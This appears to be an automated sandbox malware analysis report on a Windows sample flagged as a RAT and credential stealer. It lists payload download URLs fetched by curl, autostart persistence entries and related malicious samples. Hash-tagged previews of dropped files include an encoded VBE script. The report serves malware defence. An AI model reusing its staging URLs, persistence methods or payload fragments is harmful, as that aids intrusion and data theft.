https://contoso.com/Icon	powershell.exe, 0000001E.00000002.1758661770.0000017B40ACD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://recaptcha.net	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binJ	curl.exe, 00000005.00000002.1348744210.0000025E1A79B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1348353534.0000025E1A79A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com	RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://sketchfab.com	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://lv.queniujq.cn	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.youtube.com/	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://127.0.0.1:27060	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin--outputC:	curl.exe, 00000005.00000002.1348744210.0000025E1A767000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binurlrc	curl.exe, 00000008.00000002.1365439765.000001D6FD257000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.houseindustries.com/licenseCopyright	gh3zRWl4or.exe	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg	RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000001D.00000002.1623807747.000002AB00869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1624227305.0000017B30C88000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/recaptcha/	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://checkout.steampowered.com/	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://help.steampowered.com/	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.steampowered.com/	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/account/cookiepreferences/	RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore68	powershell.exe, 0000001D.00000002.1623807747.000002AB00641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1624227305.0000017B30A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.1399217916.0000000001480000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/;	RegAsm.exe, 0000000C.00000002.1399368735.00000000014B3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	file.garden	European Union		13335	CLOUDFLARENETUS	false
104.102.49.254	steamcommunity.com	United States		16625	AKAMAI-ASUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1522823
Start date and time:	2024-09-30 18:18:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	63
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	gh3zRWl4or.exe renamed because original name is a hash value
Original Sample Name:	77a592b9f5d0706eb93369d646deb8915303bdc725619c24378dfd3db1ca2ed2.exe
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winEXE@79/58@16/3
EGA Information:	Successful, ratio: 23.5%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, conhost.exe, schtasks.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target LBUPSPkYsNXrxZEtdVzCng.exe, PID 1536 because it is empty
Execution Graph export aborted for target LBUPSPkYsNXrxZEtdVzCng.exe, PID 2120 because it is empty
Execution Graph export aborted for target LBUPSPkYsNXrxZEtdVzCng.exe, PID 2864 because it is empty
Execution Graph export aborted for target LBUPSPkYsNXrxZEtdVzCng.exe, PID 6492 because it is empty
Execution Graph export aborted for target LBUPSPkYsNXrxZEtdVzCng.exe, PID 6780 because it is empty
Execution Graph export aborted for target msedge.exe, PID 1504 because it is empty
Execution Graph export aborted for target msedge.exe, PID 2840 because it is empty
Execution Graph export aborted for target msedge.exe, PID 516 because it is empty
Execution Graph export aborted for target msedge.exe, PID 6088 because it is empty
Execution Graph export aborted for target msedge.exe, PID 6632 because it is empty
Execution Graph export aborted for target msedge.exe, PID 7120 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4064 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7116 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: gh3zRWl4or.exe

Simulations

Behavior and APIs

Time	Type	Description
12:19:14	API Interceptor	3x Sleep call for process: RegAsm.exe modified
13:56:08	API Interceptor	51x Sleep call for process: powershell.exe modified
13:56:22	API Interceptor	1x Sleep call for process: LBUPSPkYsNXrxZEtdVzCng.exe modified
13:56:46	API Interceptor	1x Sleep call for process: msedge.exe modified
19:56:06	Task Scheduler	Run new task: LBUPSPkYsNXrxZEtdVzCng path: "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
19:56:07	Task Scheduler	Run new task: LBUPSPkYsNXrxZEtdVzCngL path: "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
19:56:07	Task Scheduler	Run new task: msedge path: "C:\Edge\msedge.exe"
19:56:07	Task Scheduler	Run new task: msedgem path: "C:\Edge\msedge.exe"
19:56:09	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LBUPSPkYsNXrxZEtdVzCng "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
19:56:17	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
19:56:26	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LBUPSPkYsNXrxZEtdVzCng "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
19:56:35	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
19:56:43	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run LBUPSPkYsNXrxZEtdVzCng "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
19:56:52	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
19:57:10	Autostart	Run: WinLogon Shell "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
19:57:18	Autostart	Run: WinLogon Shell "C:\Edge\msedge.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	docs.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
	https://wwvmicrosx.live/office365/office_cookies/main	Get hash	malicious	HTMLPhisher	Browse	wwvmicrosx.live/office365/office_cookies/main/
	http://fitur-dana-terbaru-2024.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	fitur-dana-terbaru-2024.pages.dev/favicon.ico
	http://mobilelegendsmycode.com/	Get hash	malicious	Unknown	Browse	mobilelegendsmycode.com/favicon.ico
	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
	http://twint.ch-daten.com/de/receive/bank/sgkb/79469380	Get hash	malicious	Unknown	Browse	twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	www.444317.com/
	Sept order.doc	Get hash	malicious	FormBook	Browse	www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
	1e#U0414.exe	Get hash	malicious	Lokibot	Browse	dddotx.shop/Mine/PWS/fre.php
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
steamcommunity.com	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	https://downcheck.nyc3.cdn.digitaloceanspaces.com/peltgon.zip	Get hash	malicious	LummaC	Browse	104.102.49.254
	https://downcheck.nyc3.cdn.digitaloceanspaces.com/malt.zip	Get hash	malicious	Unknown	Browse	104.102.49.254
	Full-Setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	Clipboard Hijacker, Vidar	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	docs.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=true	Get hash	malicious	Unknown	Browse	104.18.35.212
	https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://serrespec.weebly.com/tc2000-stock-charting-software.html	Get hash	malicious	Unknown	Browse	104.22.52.71
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://formacionadieste.com.de/Vrvz/	Get hash	malicious	HTMLPhisher	Browse	172.67.148.87
	http://tr.padlet.com/redirect/?url=http://dctools.mooo.com/smileyes/dhe/succes/pure/dad/mom/kid/she/qwerty/careese.pfund@stcotterturbine.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	104.18.86.42
AKAMAI-ASUS	https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0	Get hash	malicious	Unknown	Browse	104.102.35.2
	http://tr.padlet.com/redirect/?url=http://dctools.mooo.com/smileyes/dhe/succes/pure/dad/mom/kid/she/qwerty/careese.pfund@stcotterturbine.com	Get hash	malicious	HTMLPhisher	Browse	173.223.116.167
	Xkci1BfrmX.lnk	Get hash	malicious	LonePage	Browse	23.56.162.185
	Snc2ZNvAZP.pdf	Get hash	malicious	Unknown	Browse	23.56.162.185
	Purchase Order IBT LPO-2320.eml	Get hash	malicious	Unknown	Browse	23.56.162.185
	SCAN_Client_No_XP9739270128398468932393.pdf	Get hash	malicious	HTMLPhisher	Browse	96.17.64.189
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
74954a0c86284d0d6e1c4efefe92b521	file.exe	Get hash	malicious	Amadey, BitCoin Miner, SilentXMRMiner	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	188.114.96.3
	Setup_10024.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	ha9wYxkNI7.lnk	Get hash	malicious	XWorm	Browse	188.114.96.3
	9KO1ScZ376.lnk	Get hash	malicious	XWorm	Browse	188.114.96.3
	U4hM4c3l4m.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3
	f1w58Se3jL.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3
	6EFA6YABDc.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3
	1ehTzqaTXV.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3
	Document.pdf.lnk	Get hash	malicious	Bitter Elephant	Browse	188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	PO554830092024.xls	Get hash	malicious	Unknown	Browse	104.102.49.254
	PI#0034250924.xla.xlsx	Get hash	malicious	Unknown	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	Transmission Cost Database 2.0.xlsb	Get hash	malicious	Unknown	Browse	104.102.49.254

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\ASIzYbXK.log	0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	e416c0d0e2c49f0d5582d90727781330a012ebe541a60.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	p3f932IsTO.exe	Get hash	malicious	DCRat	Browse
	UpU2O6YQxG.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	5WbBcHi91R.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	4LU843t3Vt.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	ggJWCFp2S3.exe	Get hash	malicious	DCRat	Browse
	yQrCGtNgsf.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	qDlkXj5kcZ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	C0laqZmkEf.exe	Get hash	malicious	DCRat	Browse

Created / dropped Files

C:\Edge\61a52ddc9dd915

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with very long lines (335), with no line terminators
Category:	dropped
Size (bytes):	335
Entropy (8bit):	5.753518905515784
Encrypted:	false
SSDEEP:	6:W4C/CQ9D6pyJVa6+yUvc+2VZLT6EleNKtyYmu72arytron5W/3hoSoTxOUpc3mln:cZJVj6d2Vp4NKt+02auFonk32nxn
MD5:	34226EAAA6D4DB0699352201E96F8DEC
SHA1:	D7F2A3B2C0EC7DD524828E709C189FE550BA0700
SHA-256:	BE237C4285155A6E67DF295BC4D0C590D4FBD4BD96A2D484DA188A3C984EA418
SHA-512:	D4747FDC3D522C360FE30C482CAF1704993018A71417CE58B0611FEC736ACC0A124E69C02D562D4D1F408D53CD2C12DDED789A3FF40ADDFFA92F64149206FFF1
Malicious:	false
Preview:	5fZD3ggYQiHgBoraZJp0sBv5v8tc5kTrjNhfpeQ4JfvCdeMEktzeMlm3ueS5wDdqOa6yGMu53vrMQtbRvp1Luyf8lovLMUHFCExDhY7Y94la4ZnBCBJHLR5Z58McbisiomKL5YtXrdM0NEDLAtJLL93uJXIjLe7aLDwSPbFnRvasEEM04BcrZhWosZChQKMMgwpJSv5jof3aiKqELRoJCQAnqHj0YhXHiOMSZCiJG3C4n6Fis8W8gDJQvCdKLEKHHw1U8XoIseDJNG9tBBHaKYkfE6gXjX7Bs5w1FvjVTOPB99CpCtJK6t6sLVPC1RiVgCaRTIoQbwG6Ijg

C:\Edge\L6lFlVnd0szYUYb26bZc.vbe

Download File

Process:	C:\Windows\Speech\kdmapper.exe
File Type:	data
Category:	dropped
Size (bytes):	229
Entropy (8bit):	5.838240404374592
Encrypted:	false
SSDEEP:	6:GbvwqK+NkLzWbHOurFnBaORbM5nCI7hHt16fIRVbbP:GKMCzWLOuhBaORbQCsHt1nDbP
MD5:	569A28CF34F3A51DB0CC4AA0369773EC
SHA1:	23488377EA3A37B61750952D541B867AB3D8B424
SHA-256:	86300641B7D7CF7227C163FB4CC84B0115875D923949E957B18EAED9847F0329
SHA-512:	3E7855DDA257477691618305B2979EB20D33FFBEBC8F614BE736D23482E49A04A1D0AE837789B3171575F96CB197DDA04A84BB284599E0E18769473594FF6051
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^zAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2vFX!ZT@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z39o.zzsk0t6zWVK8YnfXrhj0kb.wl)/pjVSyr!9)jc#ZT%s1c-4TR4COr~~!B~6lsk+hkAAAA==^#~@.

C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat

Download File

Process:	C:\Windows\Speech\kdmapper.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	70
Entropy (8bit):	4.968079981014333
Encrypted:	false
SSDEEP:	3:cNjpJgFNeUpnbG0DLagi0m:U1ueUJbGwLBE
MD5:	68B1414DBD5A51F2F75912513D1A035E
SHA1:	A45E03F8EDADA7FDF3697EAA6D88785CD464D373
SHA-256:	48F984A346659261B6A2CFBDF6C558A09201EB4A0DBA69F56F7A403EA7B8EB9E
SHA-512:	AA4921FCAACEE5472C7BBAA7BD1ECCB837689F988650DCE644968D6CE422C9BB1D5B4D0304F0DD5C0D643E5B3CF1B65752B704528804AC24E5BFC38D5C1205FC
Malicious:	false
Preview:	%ZrAnvfoASNUfO%%CBvOlEkO%..%VxFgqUHpnZxb%"C:\Edge/msedge.exe"%oRfhCeQ%

C:\Edge\msedge.exe

Download File

Process:	C:\Windows\Speech\kdmapper.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1963008
Entropy (8bit):	7.552676792704024
Encrypted:	false
SSDEEP:	24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
MD5:	ABD343DF6FBD7334D617F76F6F050E3C
SHA1:	864A1DA1AF2E7B5049B8E7A93402D2BDED518681
SHA-256:	1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
SHA-512:	56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Edge\msedge.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Edge\msedge.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)......8I...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....

C:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1168
Entropy (8bit):	4.448520842480604
Encrypted:	false
SSDEEP:	24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
MD5:	B5189FB271BE514BEC128E0D0809C04E
SHA1:	5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
SHA-256:	E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
SHA-512:	F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
Malicious:	false
Preview:	.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.9368005565809114
Encrypted:	false
SSDEEP:	48:6nmhtgWxZ8RxeOAkFJOcV4MKe28dfEc3s0RvqBH7uulB+hnqXSfbNtm:DCXxvxVx9slwvktTkZzNt
MD5:	F071F47F6CD476AC97E8B525A1EA1F0D
SHA1:	2F3A3F02D4DED8CF21C4A06A6D6FEA9F63943DFD
SHA-256:	8E6A161C417CB75D31384F83A907CE9720D1EBD3958084F64F483460EF26FC31
SHA-512:	A8EF3A26346CBDD6CAAC4146BEE642341722064CE282323AC2F516B01D58AFA02FEFFF9AE6C87DCC178531F22ECA16133ED828A2880CE797A0A5CE2501193834
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................p'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..H.............................................................(.....0..!.......r...pr...p.{....(....(....&..&......................0..........r...p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID...(... ...#Blob...........WU........%3................................................................

C:\Users\user\AppData\Local\3e80c92b4a3ad6

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with very long lines (892), with no line terminators
Category:	dropped
Size (bytes):	892
Entropy (8bit):	5.902085913543657
Encrypted:	false
SSDEEP:	24:XfLs9BXBzY2iE2y6Fn4v/mbTlT4hL43YCMpWyHoBOk:XDs9nYQIFaWq6yHoAk
MD5:	274A882DA1EABE7085863D16F9D9515B
SHA1:	F62484DB672BE6479C095DA961EE1F2DE5D65864
SHA-256:	1125423D22D320B20F36FACB69DDF1703048602FEEB3A293BEABAB62C083A3D7
SHA-512:	44DE8C74842D917EC7DB6F24109393D5197C19A7C9C45048E5E69985902AFBF26C41F7384E4CE8D51FF78C8CABC26219771D2C2CE164AE40ACE11059D0DA8D8C
Malicious:	false
